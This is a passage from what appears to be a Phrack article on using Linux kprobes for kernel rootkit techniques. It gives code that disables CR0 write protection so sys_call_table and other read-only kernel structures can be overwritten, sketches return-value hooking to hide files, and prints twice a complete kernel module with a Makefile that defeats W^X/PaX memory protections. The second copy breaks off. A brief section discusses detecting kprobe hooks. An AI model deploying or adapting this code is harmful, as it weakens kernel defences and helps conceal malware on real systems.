if (ri->task != current)
|
|
/* another task is sharing our hash bucket */
|
|
continue;
|
|
|
|
if (ri->rp && ri->rp->handler) {
|
|
__get_cpu_var(current_kprobe) = &ri->rp->kp;
|
|
get_kprobe_ctlblk()->kprobe_status =
|
|
KPROBE_HIT_ACTIVE;
|
|
ri->rp->handler(ri, regs);
|
|
__get_cpu_var(current_kprobe) = NULL;
|
|
}
|
|
|
|
orig_ret_address = (unsigned long)ri->ret_addr;
|
|
recycle_rp_inst(ri, &empty_rp);
|
|
|
|
if (orig_ret_address != trampoline_address)
|
|
/*
|
|
* This is the real return address. Any other
|
|
* instances associated with this task are for
|
|
* other calls deeper on the call stack
|
|
*/
|
|
break;
|
|
}
|
|
|
|
kretprobe_assert(ri, orig_ret_address, trampoline_address);
|
|
|
|
kretprobe_hash_unlock(current, &flags);
|
|
|
|
hlist_for_each_entry_safe(ri, node, tmp, &empty_rp, hlist) {
|
|
hlist_del(&ri->hlist);
|
|
kfree(ri);
|
|
}
|
|
return (void *)orig_ret_address;
|
|
}
|
|
|
|
The original return address value is returned, and the
kretprobe_trampoline stub then copies it onto the stack at the right
location, at which point all of the saved registers are popped and
restored -- resulting in a return to the original calling function with
the original return value. I suppose it doesn't take an overactive
imagination to see that the kretprobe_trampoline stub code could be
modified to return a different value. This could be done in several ways,
but it would exceed the scope of hacking purely with kprobes. The
arch_prepare_kretprobe() function would have to be patched (and it sadly
cannot be patched using a kprobe, because functions marked __kprobes
cannot themselves be hooked with kprobes).
|
|
|
|
-- A simple patch within arch_prepare_kretprobe()
|
|
|
|
*sara = (unsigned long)&kretprobe_trampoline;
|
|
|
|
Could be changed to:
|
|
|
|
*sara = (unsigned long)&custom_asm_stub;
|
|
|
|
The problem is that arch_prepare_kretprobe() would have to be modified
using a technique other than kprobes, which is of course easy enough but
exceeds this paper's scope. If you are interested in doing this, the next
section will give you a trick that will be necessary for doing so.
|
|
|
|
|
|
----[ 2.5 - A quick stop into modifying read-only kernel segments
|
|
|
|
If you do feel interested in hijacking arch_prepare_kretprobe()
using a function trampoline, do remember that modern Intel CPUs
have the write-protect bit (CR0.WP), which prevents modifications to
read-only pages, so any time you want to modify a data structure
that resides in .rodata you will need to use the functions I provide
below. The following types of data structures often
exist in the kernel's text segment:
|
|
|
|
1. void **sys_call_table
|
|
2. const struct file_operations <fs_fops_name>
|
|
3. const struct vm_ops <vma_vmops_name>
|
|
4. kernel functions
|
|
|
|
Data structures defined as 'const' will go into the .rodata section,
which is at the end of the text segment, and the kernel code itself
generally exists in the .text section of the text segment. Attempting
writes to these locations will cause kernel freezes/panics/oopses.
|
|
|
|
Some people modify the page table entry data for read-only pages they
|
|
want to modify, but the following functions I have provided are much
|
|
simpler, and an example will be provided below.
|
|
|
|
/* FUNCTION TO DISABLE WRITE PROTECT BIT IN CPU */
|
|
static void disable_wp(void)
|
|
{
|
|
unsigned int cr0_value;
|
|
|
|
asm volatile ("movl %%cr0, %0" : "=r" (cr0_value));
|
|
|
|
/* Disable WP */
|
|
cr0_value &= ~(1 << 16);
|
|
|
|
asm volatile ("movl %0, %%cr0" :: "r" (cr0_value));
|
|
|
|
}
|
|
|
|
/* FUNCTION TO RE-ENABLE WRITE PROTECT BIT IN CPU */
|
|
static void enable_wp(void)
|
|
{
|
|
unsigned int cr0_value;
|
|
|
|
asm volatile ("movl %%cr0, %0" : "=r" (cr0_value));
|
|
|
|
/* Enable WP */
|
|
cr0_value |= (1 << 16);
|
|
|
|
asm volatile ("movl %0, %%cr0" :: "r" (cr0_value));
|
|
|
|
}
|
|
|
|
So if you wanted to modify a kernel function pointer that exists within
|
|
the text segment (If it is declared const) -- I.E the sys_call_table:
|
|
|
|
disable_wp();
|
|
sys_call_table[__NR_write] = (void *)n_sys_write;
|
|
enable_wp();
|
|
|
|
Or assuming you have a function that hijacks arch_prepare_kretprobe() using
|
|
the method discussed here [3]
|
|
|
|
disable_wp();
|
|
hijack_arch_prepare_kretprobe();
|
|
enable_wp();
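
The inline asm above uses 32-bit movl and an unsigned int, so it only fits
the 32-bit kernels this paper targets. A sketch of the same idea using the
kernel's read_cr0()/write_cr0() helpers, which also work on x86_64, is
below; note that this is my own variant, and that very recent kernels pin
CR0.WP and will fight back against clearing it this way.

static inline void wp_off(void)
{
	/* clear CR0.WP (bit 16) so the CPU allows writes to read-only pages */
	write_cr0(read_cr0() & ~0x10000UL);
}

static inline void wp_on(void)
{
	/* set CR0.WP (bit 16) again */
	write_cr0(read_cr0() | 0x10000UL);
}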
|
|
|
|
|
|
You get the idea. But since we've fallen a bit off track lets move into
|
|
the next section which is actually more relative to the paper.
|
|
|
|
|
|
----[ 2.6 - An idea for a kretprobe implementation for hackers
|
|
|
|
|
|
The primary restriction in patching the kernel should be obvious by now:
we CANNOT modify the return value in return probes (kretprobes). If someone
felt so inclined, they could (in an LKM) implement something very similar
to the kretprobe implementation. This would allow us to instrument the
kernel using kprobes and modify the return value -- and therefore easily
patch functions like filldir64, simply using our special kretprobe
implementation to 'return 0' whenever 'char *d_name' matched a file we
wanted to hide.
|
|
|
|
If the reader studies /usr/src/linux/kernel/kprobes.c after reading the
above section on the kretprobe implementation, it becomes apparent that a
more flexible kretprobe implementation could be designed. This is hardly
difficult if the reader has followed this paper in its entirety. I simply
did not have enough time to design this feature -- a kretprobe for hackers
that allows control of the return value. Let's call this feature 'rpe'
(Return Probe Elite); the BASIC schematics would look like this:
|
|
|
|
int register_rpe(struct kretprobe *rp)
|
|
{
|
|
|
|
... <code> ...
|
|
rp->kp.pre_handler = pre_handler_rpe;
|
|
... <code> ...
|
|
}
|
|
|
|
static int pre_handler_rpe(struct kprobe *p,
|
|
struct pt_regs *regs)
|
|
{
|
|
arch_prepare_rpe(regs);
|
|
|
|
}
|
|
|
|
|
|
void arch_prepare_rpe(struct pt_regs *regs)
{
	unsigned long *ret = stack_addr(regs);

	ret_addr = (kprobe_opcode_t *) *ret;

	/* Replace the return addr with trampoline addr */
	*ret = (unsigned long) &rpe_trampoline;
}
|
|
|
|
rpe_trampoline could be either an asm stub or an actual
function -- either way you would want to back up the registers
before calling your handler, which does whatever you want:
process data and ultimately return whatever value you choose.
For instance:
|
|
__asm__ ("movl $val, %eax\n"
|
|
"push $ret_addr\n"
|
|
"ret");
|
|
|
|
Since I did not provide an implementation for a more flexible
|
|
kretprobe, the reader may be interested in doing so. Once I
|
|
get an opportunity I intend on writing an LKM patch for one
|
|
and releasing it.
|
|
|
|
|
|
---[ 3 - Patch to unpatch W^X (mprotect/mmap restrictions)
|
|
|
|
Let's move on to a couple of other patches using the existing
kprobe features, to show some usefulness beyond a file hiding
mechanism. These two patches aim at disabling the W^X feature
that is enforced in some kernels -- PaX, for instance, calls this
mprotect restrictions. W^X means that an mmap segment cannot be created
or modified to be both writable and executable. The patches below give us
two benefits:
|
|
|
|
1. On systems with the NX (no_exec_pages) bit set, we will be able
|
|
to do things like mark the data segment as executable and inject
|
|
code there for execution using ptrace.
|
|
|
|
2. Many ELF protectors (Burneye, Shiva, Elfcrypt, etc.) store the
encrypted executable in the text segment of the stub/loading code,
and decrypting part of a program's own text is considered self
modifying code -- W^X prevents this. So with our anti-W^X patch
we can use our ELF protectors, and make segments such as the stack
and data segment, once again, executable on systems with the NX bit set,
where mprotect/mmap restrictions really make a difference.
|
|
|
|
An important note: due to the design of the following
patch, we cannot change the return values, so mprotect and mmap
will both return a value that says they failed -- don't bail out
on that error check, because your write+execute mmap and mprotect
attempts actually succeed. To verify, you can look at /proc/pid/maps
of the given process.
|
|
|
|
-- tested on 2.6.18 --
|
|
|
|
On modern systems simply change regs->eax to regs->ax in the two necessary
spots. Also, declaring the module license as GPL is not necessary in order
to use kprobes on modern systems.
|
|
|
|
#include <linux/kernel.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kprobes.h>
|
|
#include <linux/mm.h>
|
|
#include <linux/fs.h>
|
|
#include <linux/file.h>
|
|
|
|
|
|
#define PROT_READ 0x1 /* Page can be read. */
|
|
#define PROT_WRITE 0x2 /* Page can be written. */
|
|
#define PROT_EXEC 0x4 /* Page can be executed. */
|
|
#define PROT_NONE 0x0 /* Page can not be accessed. */
|
|
#define MAP_FIXED 0x10
|
|
|
|
#define MAP_ANONYMOUS 0x20 /* don't use a file */
|
|
#define MAP_GROWSDOWN 0x0100 /* stack-like segment */
|
|
#define MAP_DENYWRITE 0x0800 /* ETXTBSY */
|
|
#define MAP_EXECUTABLE 0x1000 /* mark it as an executable */
|
|
|
|
/*
|
|
* It is preferable to write a script that gets
|
|
* kallsyms_lookup_name() from System.map and then
|
|
* passes it as a module parameter, but in this example
|
|
* we just look it up and assign it our selves, so
|
|
* make sure to change the address.
|
|
*/
|
|
unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this
|
|
|
|
unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr, unsigned long len,
|
|
unsigned long pgoff, unsigned long flags);
|
|
|
|
|
|
static struct
|
|
{
|
|
int assign_wx;
|
|
unsigned long start;
|
|
size_t len;
|
|
long prot;
|
|
} mprotect;
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot)
|
|
{
|
|
struct vm_area_struct *vma = current->mm->mmap;
|
|
|
|
mprotect.assign_wx = 0;
|
|
mprotect.start = start;
|
|
mprotect.prot = prot;
|
|
|
|
/* This doesn't concern us */
|
|
if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE))
|
|
goto out;
|
|
|
|
	down_write(&current->mm->mmap_sem);
|
|
|
|
/* Get vma for start memory area */
|
|
vma = find_vma(current->mm, start);
|
|
if (!vma)
|
|
goto free_sem;
|
|
|
|
if (prot & (PROT_WRITE|PROT_EXEC))
|
|
{
|
|
mprotect.assign_wx++;
|
|
goto free_sem;
|
|
}
|
|
|
|
if (prot & PROT_WRITE)
|
|
{
|
|
mprotect.assign_wx++;
|
|
goto free_sem;
|
|
}
|
|
|
|
if (prot & PROT_EXEC)
|
|
{
|
|
mprotect.assign_wx++;
|
|
goto free_sem;
|
|
}
|
|
|
|
free_sem:
|
|
	up_write(&current->mm->mmap_sem);
|
|
|
|
out:
|
|
jprobe_return();
|
|
return 0;
|
|
}
|
|
|
|
/*
|
|
before the following function is executed, a W^X patch such as PaX
|
|
mprotect/mmap restrictions, will have code such as:
|
|
if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC)
|
|
vm_flags &= ~(VM_EXEC | VM_MAYEXEC);
|
|
else
|
|
vm_flags &= ~(VM_WRITE | VM_MAYWRITE);
|
|
|
|
But our return probe gets the last say in the matter. mprotect
|
|
will return like it failed (With a positive value) but the VMA's
|
|
or memory maps will be both write+execute, just make sure that
|
|
you don't error checking then exit if mprotect or mmap fail
|
|
because they will return failed values.
|
|
*/
|
|
|
|
static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
struct vm_area_struct *vma;
|
|
|
|
if (!mprotect.assign_wx)
|
|
goto out;
|
|
|
|
	down_write(&current->mm->mmap_sem);
|
|
|
|
/* Get vma for start memory area */
|
|
vma = find_vma(current->mm, mprotect.start);
|
|
if (!vma)
|
|
goto sem_out;
|
|
|
|
if (mprotect.prot & PROT_EXEC)
|
|
{
|
|
vma->vm_flags |= VM_MAYEXEC;
|
|
vma->vm_flags |= VM_EXEC;
|
|
}
|
|
|
|
if (mprotect.prot & PROT_WRITE)
|
|
{
|
|
vma->vm_flags |= VM_MAYWRITE;
|
|
vma->vm_flags |= VM_WRITE;
|
|
}
|
|
|
|
sem_out:
|
|
	up_write(&current->mm->mmap_sem);
|
|
|
|
|
|
out:
|
|
return 0;
|
|
}
|
|
|
|
struct
|
|
{
|
|
unsigned long addr;
|
|
#define MMAP_CLEAN 0
|
|
#define MMAP_DIRTY 1
|
|
int mmap_prot_state;
|
|
unsigned int len;
|
|
} do_mmap_data;
|
|
|
|
/* Return probe code for sys_mmap2 */
|
|
static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
struct vm_area_struct *vma = current->mm->mmap;
|
|
|
|
/* we are assuming the default function to get an unmapped region is arch_get_unmapped_topdown() */
|
|
if (do_mmap_data.addr - regs->eax == do_mmap_data.len)
|
|
do_mmap_data.addr = regs->eax;
|
|
else
|
|
goto out; // pretty unlikely
|
|
|
|
switch(do_mmap_data.mmap_prot_state)
|
|
{
|
|
case MMAP_CLEAN:
|
|
break;
|
|
case MMAP_DIRTY: // lets undo the work of the W^X patch :)
|
|
		down_write(&current->mm->mmap_sem);
|
|
vma = find_vma(current->mm, do_mmap_data.addr);
|
|
if (!vma)
|
|
break;
|
|
printk("Found vma's and setting all writes and exec possibilities\n");
|
|
vma->vm_flags |= (VM_EXEC | VM_MAYEXEC);
|
|
vma->vm_flags |= (VM_WRITE | VM_MAYWRITE);
|
|
		up_write(&current->mm->mmap_sem);
|
|
break;
|
|
}
|
|
out:
|
|
return 0;
|
|
}
|
|
|
|
asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags,
|
|
unsigned long fd, unsigned long pgoff)
|
|
{
|
|
|
|
struct file *file = NULL;
|
|
|
|
printk("In sys_mmap2\n");
|
|
do_mmap_data.len = len;
|
|
|
|
/* We emulate a combination of sys_mmap2 and do_mmap_pgoff */
|
|
|
|
/* This is the easiest scenario */
|
|
/* because we know the mmap addr */
|
|
if (flags & MAP_FIXED)
|
|
{
|
|
printk("MAP_FIXED\n");
|
|
do_mmap_data.addr = addr;
|
|
if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
|
|
do_mmap_data.mmap_prot_state = MMAP_DIRTY;
|
|
else
|
|
do_mmap_data.mmap_prot_state = MMAP_CLEAN;
|
|
goto out;
|
|
}
|
|
|
|
flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
|
|
if (!(flags & MAP_ANONYMOUS))
|
|
{
|
|
file = fget(fd);
|
|
if (!file)
|
|
goto out;
|
|
}
|
|
|
|
/* mimick do_mmap_pgoff to get the linear range */
|
|
	down_write(&current->mm->mmap_sem);
|
|
|
|
if (file)
|
|
{
|
|
if (!file->f_op || !file->f_op->mmap)
|
|
goto sem_out;
|
|
}
|
|
|
|
if (!len)
|
|
goto sem_out;
|
|
|
|
len = PAGE_ALIGN(len);
|
|
if (!len || len > TASK_SIZE)
|
|
goto sem_out;
|
|
|
|
if ((pgoff + (len >> PAGE_SHIFT)) < pgoff)
|
|
goto sem_out;
|
|
|
|
/* when the real sys_mmap2/do_mmap_pgoff are called
|
|
* they will get the next linear range
|
|
* which will be at do_mmap_data.addr - do_mmap_data.len
|
|
* This relies on get_unmapped_area() calling arch_get_unmapped_area_topdown()
|
|
*/
|
|
printk("get_unmapped_area call\n");
|
|
addr = _get_unmapped_area(file, addr, len, 0, flags);
|
|
printk("addr: 0x%lx\n", addr);
|
|
do_mmap_data.addr = addr;
|
|
|
|
if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
|
|
do_mmap_data.mmap_prot_state = MMAP_DIRTY;
|
|
else
|
|
do_mmap_data.mmap_prot_state = MMAP_CLEAN;
|
|
|
|
sem_out:
|
|
	up_write(&current->mm->mmap_sem);
|
|
out:
|
|
jprobe_return();
|
|
return 0;
|
|
|
|
}
|
|
|
|
static struct jprobe sys_mmap2_jprobe =
|
|
{
|
|
.entry = (kprobe_opcode_t *)kp_sys_mmap2
|
|
};
|
|
|
|
static struct jprobe sys_mprotect_jprobe =
|
|
{
|
|
.entry = (kprobe_opcode_t *)kp_sys_mprotect
|
|
};
|
|
|
|
static struct kretprobe mprotect_kretprobe =
|
|
{
|
|
.handler = rp_mprotect,
|
|
.maxactive = 1 // this code isn't really SMP reliable
|
|
};
|
|
|
|
static struct kretprobe mmap_kretprobe =
|
|
{
|
|
.handler = rp_mmap,
|
|
.maxactive = 1 // this code isn't really SMP reliable
|
|
};
|
|
|
|
|
|
void exit_module(void)
|
|
{
|
|
unregister_jprobe(&sys_mmap2_jprobe);
|
|
unregister_jprobe(&sys_mprotect_jprobe);
|
|
|
|
unregister_kretprobe(&mprotect_kretprobe);
|
|
unregister_kretprobe(&mmap_kretprobe);
|
|
}
|
|
|
|
int init_module(void)
|
|
{
|
|
int j = 0, k = 0;
|
|
|
|
_get_unmapped_area = (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown");
|
|
|
|
sys_mmap2_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
|
|
/* Register our jprobes */
|
|
if (register_jprobe(&sys_mmap2_jprobe) < 0)
|
|
goto jfail;
|
|
j++;
|
|
|
|
sys_mprotect_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
|
|
if (register_jprobe(&sys_mprotect_jprobe) < 0)
|
|
goto jfail;
|
|
|
|
mprotect_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
|
|
/* Register our kretprobes */
|
|
if (register_kretprobe(&mprotect_kretprobe) < 0)
|
|
goto kfail;
|
|
k++;
|
|
|
|
mmap_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
|
|
if (register_kretprobe(&mmap_kretprobe) < 0)
|
|
goto kfail;
|
|
|
|
return 0;
|
|
|
|
jfail:
|
|
|
|
printk(KERN_EMERG "register_jprobe failed for %s\n", (!j ? "sys_mmap2" : "sys_mprotect"));
|
|
kfail:
|
|
printk(KERN_EMERG "register_kretprobe failed for %s\n", (!k ? "mprotect" : "mmap"));
|
|
|
|
return -1;
|
|
}
|
|
|
|
|
|
module_exit(exit_module);
|
|
|
|
--- end of code ---
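
A quick userland sanity check for the module above -- a minimal sketch of
my own, not part of the original code: it asks for a write+execute
anonymous mapping and then greps /proc/self/maps for "rwx" lines, since
with the module loaded the mmap()/mprotect() return values look like
failures even though the mapping is created.

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

int main(void)
{
	char line[256];
	FILE *fp;

	/* ask for a W+X anonymous mapping; ignore the (faked) error return */
	void *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
		       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	printf("mmap returned %p (may look like MAP_FAILED)\n", p);

	/* the maps file is what to trust */
	fp = fopen("/proc/self/maps", "r");
	if (!fp)
		return 1;
	while (fgets(line, sizeof(line), fp))
		if (strstr(line, "rwx"))
			fputs(line, stdout);
	fclose(fp);
	return 0;
}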
|
|
|
|
|
|
---[ 4 - Notes on rootkit detection for kprobes
|
|
|
|
If a kernel rootkit is designed solely using kprobes and properly hides
itself from the kprobe entries under /sys/kernel/debug, then a rootkit
detection program can still easily detect which kernel functions have been
hooked. I will leave this obvious solution to anyone interested in adding
the feature to their detectors, but the answer lies in this paper as well
as in the kprobe documentation.
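
For instance, since a registered kprobe plants a breakpoint instruction
(int3, opcode 0xCC) at the probed address, a detector could simply compare
the first byte of interesting kernel functions against 0xCC. A minimal
sketch -- the symbol list here is purely illustrative:

static const char *watched[] = {
	"sys_write", "sys_getdents64", "filldir64", "sys_mprotect",
};

static void scan_for_probes(void)
{
	unsigned char *addr;
	int i;

	for (i = 0; i < ARRAY_SIZE(watched); i++) {
		addr = (unsigned char *)kallsyms_lookup_name(watched[i]);
		if (!addr)
			continue;
		if (*addr == 0xCC)	/* int3 planted on the entry point */
			printk("possible kprobe on %s at %p\n", watched[i], addr);
	}
}

A more thorough detector would compare whole function bodies against the
on-disk vmlinux rather than just the first byte, since probes can sit on
any instruction.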
|
|
|
|
|
|
---[ 5 - Summing it all up
|
|
|
|
We have seen that the kprobe interface, which is primarily implemented
for kernel debugging, can be used to instrument the kernel in some
interesting ways. We have explored kprobes' strengths and weaknesses, and
provided several examples of weakening the kernel by patching it using
jprobe and kretprobe techniques. We also went over some ideas for a more
hacker-friendly kretprobe implementation (although we did not provide one).
|
|
|
|
It is also important to mention, for people who are engineering security
code, that kprobes can be used to debug kernel code as well as to install
simple patches for hardening the kernel. But Phrack isn't about that, so
patches to harden the kernel were not included -- just know that it is
possible.
|
|
|
|
|
|
---[ 6 - Greetz
|
|
|
|
kad - thanks for encouraging me to write this, and for being a cool guy
with priceless skills and good advice.
|
|
|
|
Silvio - My initial inspiration for kernel and ELF hacking all started with you.
|
|
You've been a good friend and mentor, many many thanks.
|
|
|
|
chrak - My long time friend and occasional coding partner. 13yrs ago this guy
|
|
helped me write my first backdoor program for Linux.
|
|
|
|
nynex - I owe you for hosting my stuff and being a good friend.
|
|
|
|
mayhem - For writing some really cool ELF code and being an inspiration.
|
|
|
|
grugq - Your original AF work has been an inspiration as well.
|
|
|
|
halfdead - For knowing everything about the universe and our realm *literally*
|
|
|
|
jimjones (UNIX Terrorist) - you will be getting a copy of this soon, word.
|
|
|
|
All of the digitalnerds -- especially halfdead, scrippie, pronsa and abh.
|
|
|
|
#bitlackeys on EFnet, a small and strange little channel with people whom
|
|
I've been friends with for years.
|
|
|
|
#formal on a secret network with extremely smart people and good conversation.
|
|
|
|
RuxCon folk are pretty much all awesome too, thanks.
|
|
|
|
|
|
---[ 7 - References
|
|
|
|
Please note that I did not use any references other than code and official
|
|
documentation for this paper, but the following papers are quite relevant and
|
|
since I have read them (along with many other great papers) they all play a
|
|
role in my collective knowledge of kernel malware and rootkit exploration.
|
|
|
|
[1] kad - Handling interrupt descriptor table for fun and profit
|
|
http://www.phrack.org/issues.html?issue=59&id=4#article
|
|
|
|
[2] Halfdead - Mystifying the debugger for ultimate stealthness
|
|
http://www.phrack.org/issues.html?issue=65&id=8#article
|
|
|
|
[3] Silvio - Kernel function hijacking (Function trampolines)
|
|
http://vxheavens.com/lib/vsc08.html
|
|
|
|
|
|
---[ 8 - Code
|
|
|
|
/*
|
|
Tested on 2.6.18 kernel, on modern kernels change regs->eax to regs->ax.
|
|
From the ElfMaster, 2010.
|
|
|
|
Makefile:
|
|
|
|
obj-m += w_plus_x.o
|
|
|
|
MODULES = w_plus_x.ko
|
|
|
|
all: clean $(MODULES)
|
|
|
|
$(MODULES):
|
|
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
|
|
|
|
clean:
|
|
rm -f *.o *.ko Module.markers Module.symvers w_plus_x*.mod.c modules.order
|
|
|
|
|
|
*/
|
|
|
|
|
|
#include <linux/kernel.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kprobes.h>
|
|
#include <linux/mm.h>
|
|
#include <linux/fs.h>
|
|
#include <linux/file.h>
|
|
|
|
|
|
#define PROT_READ 0x1 /* Page can be read. */
|
|
#define PROT_WRITE 0x2 /* Page can be written. */
|
|
#define PROT_EXEC 0x4 /* Page can be executed. */
|
|
#define PROT_NONE 0x0 /* Page can not be accessed. */
|
|
#define MAP_FIXED 0x10
|
|
|
|
#define MAP_ANONYMOUS 0x20 /* don't use a file */
|
|
#define MAP_GROWSDOWN 0x0100 /* stack-like segment */
|
|
#define MAP_DENYWRITE 0x0800 /* ETXTBSY */
|
|
#define MAP_EXECUTABLE 0x1000 /* mark it as an executable */
|
|
|
|
/*
|
|
* It is preferable to write a script that gets
|
|
* kallsyms_lookup_name() from System.map and then
|
|
* passes it as a module parameter, but in this example
|
|
* we just look it up and assign it our selves, so
|
|
* make sure to change the address.
|
|
*/
|
|
unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this
|
|
|
|
unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr, unsigned long len,
|
|
unsigned long pgoff, unsigned long flags);
|
|
|
|
|
|
static struct
|
|
{
|
|
int assign_wx;
|
|
unsigned long start;
|
|
size_t len;
|
|
long prot;
|
|
} mprotect;
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot)
|
|
{
|
|
struct vm_area_struct *vma = current->mm->mmap;
|
|
|
|
mprotect.assign_wx = 0;
|
|
mprotect.start = start;
|
|
mprotect.prot = prot;
|
|
|
|
/* This doesn't concern us */
|
|
if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE))
|
|
goto out;
|
|
|
|
	down_write(&current->mm->mmap_sem);
|
|
|
|
/* Get vma for start memory area */
|
|
vma = find_vma(current->mm, start);
|
|
if (!vma)
|
|
goto free_sem;
|
|
|
|
if (prot & (PROT_WRITE|PROT_EXEC))
|
|
{
|
|
mprotect.assign_wx++;
|
|
goto free_sem;
|
|
}
|
|
|
|
if (prot & PROT_WRITE)
|
|
{
|
|
mprotect.assign_wx++;
|
|
goto free_sem;
|
|
}
|
|
|
|
if (prot & PROT_EXEC)
|
|
{
|
|
mprotect.assign_wx++;
|
|
goto free_sem;
|
|
}
|
|
|
|
free_sem:
|
|
	up_write(&current->mm->mmap_sem);
|
|
|
|
out:
|
|
jprobe_return();
|
|
return 0;
|
|
}
|
|
|
|
/*
|
|
before the following function is executed, a W^X patch such as PaX
|
|
mprotect/mmap restrictions, will have code such as:
|
|
if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC)
|
|
vm_flags &= ~(VM_EXEC | VM_MAYEXEC);
|
|
else
|
|
vm_flags &= ~(VM_WRITE | VM_MAYWRITE);
|
|
|
|
But our return probe gets the last say in the matter. mprotect
|
|
will return like it failed (With a positive value) but the VMA's
|
|
or memory maps will be both write+execute, just make sure that
|
|
you don't error checking then exit if mprotect or mmap fail
|
|
because they will return failed values.
|
|
*/
|
|
|
|
static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
struct vm_area_struct *vma;
|
|
|
|
if (!mprotect.assign_wx)
|
|
goto out;
|
|
|
|
	down_write(&current->mm->mmap_sem);
|
|
|
|
/* Get vma for start memory area */
|
|
vma = find_vma(current->mm, mprotect.start);
|
|
if (!vma)
|
|
goto sem_out;
|
|
|
|
if (mprotect.prot & PROT_EXEC)
|
|
{
|
|
vma->vm_flags |= VM_MAYEXEC;
|
|
vma->vm_flags |= VM_EXEC;
|
|
}
|
|
|
|
if (mprotect.prot & PROT_WRITE)
|
|
{
|
|
vma->vm_flags |= VM_MAYWRITE;
|
|
vma->vm_flags |= VM_WRITE;
|
|
}
|
|
|
|
sem_out:
|
|
	up_write(&current->mm->mmap_sem);
|
|
|
|
|
|
out:
|
|
return 0;
|
|
}
|
|
|
|
struct
|
|
{
|
|
unsigned long addr;
|
|
#define MMAP_CLEAN 0
|
|
#define MMAP_DIRTY 1
|
|
int mmap_prot_state;
|
|
unsigned int len;
|
|
} do_mmap_data;
|
|
|
|
/* Return probe code for sys_mmap2 */
|
|
static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs)
|
|
{
|
|
struct vm_area_struct *vma = current->mm->mmap;
|
|
|
|
/* we are assuming the default function to get an unmapped region is arch_get_unmapped_topdown() */
|
|
if (do_mmap_data.addr - regs->eax == do_mmap_data.len)
|
|
do_mmap_data.addr = regs->eax;
|
|
else
|
|
goto out; // pretty unlikely
|
|
|
|
switch(do_mmap_data.mmap_prot_state)
|
|
{
|
|
case MMAP_CLEAN:
|
|
break;
|
|
case MMAP_DIRTY: // lets undo the work of the W^X patch :)
|
|
		down_write(&current->mm->mmap_sem);
|
|
vma = find_vma(current->mm, do_mmap_data.addr);
|
|
if (!vma)
|
|
break;
|
|
printk("Found vma's and setting all writes and exec possibilities\n");
|
|
vma->vm_flags |= (VM_EXEC | VM_MAYEXEC);
|
|
vma->vm_flags |= (VM_WRITE | VM_MAYWRITE);
|
|
		up_write(&current->mm->mmap_sem);
|
|
break;
|
|
}
|
|
out:
|
|
return 0;
|
|
}
|
|
|
|
asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags,
|
|
unsigned long fd, unsigned long pgoff)
|
|
{
|
|
|
|
struct file *file = NULL;
|
|
|
|
printk("In sys_mmap2\n");
|
|
do_mmap_data.len = len;
|
|
|
|
/* We emulate a combination of sys_mmap2 and do_mmap_pgoff */
|
|
|
|
/* This is the easiest scenario */
|
|
/* because we know the mmap addr */
|
|
if (flags & MAP_FIXED)
|
|
{
|
|
printk("MAP_FIXED\n");
|
|
do_mmap_data.addr = addr;
|
|
if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
|
|
do_mmap_data.mmap_prot_state = MMAP_DIRTY;
|
|
else
|
|
do_mmap_data.mmap_prot_state = MMAP_CLEAN;
|
|
goto out;
|
|
}
|
|
|
|
flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
|
|
if (!(flags & MAP_ANONYMOUS))
|
|
{
|
|
file = fget(fd);
|
|
if (!file)
|
|
goto out;
|
|
}
|
|
|
|
/* mimick do_mmap_pgoff to get the linear range */
|
|
	down_write(&current->mm->mmap_sem);
|
|
|
|
if (file)
|
|
{
|
|
if (!file->f_op || !file->f_op->mmap)
|
|
goto sem_out;
|
|
}
|
|
|
|
if (!len)
|
|
goto sem_out;
|
|
|
|
len = PAGE_ALIGN(len);
|
|
if (!len || len > TASK_SIZE)
|
|
goto sem_out;
|
|
|
|
if ((pgoff + (len >> PAGE_SHIFT)) < pgoff)
|
|
goto sem_out;
|
|
|
|
/* when the real sys_mmap2/do_mmap_pgoff are called
|
|
* they will get the next linear range
|
|
* which will be at do_mmap_data.addr - do_mmap_data.len
|
|
* This relies on get_unmapped_area() calling arch_get_unmapped_area_topdown()
|
|
*/
|
|
printk("get_unmapped_area call\n");
|
|
addr = _get_unmapped_area(file, addr, len, 0, flags);
|
|
printk("addr: 0x%lx\n", addr);
|
|
do_mmap_data.addr = addr;
|
|
|
|
if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
|
|
do_mmap_data.mmap_prot_state = MMAP_DIRTY;
|
|
else
|
|
do_mmap_data.mmap_prot_state = MMAP_CLEAN;
|
|
|
|
sem_out:
|
|
	up_write(&current->mm->mmap_sem);
|
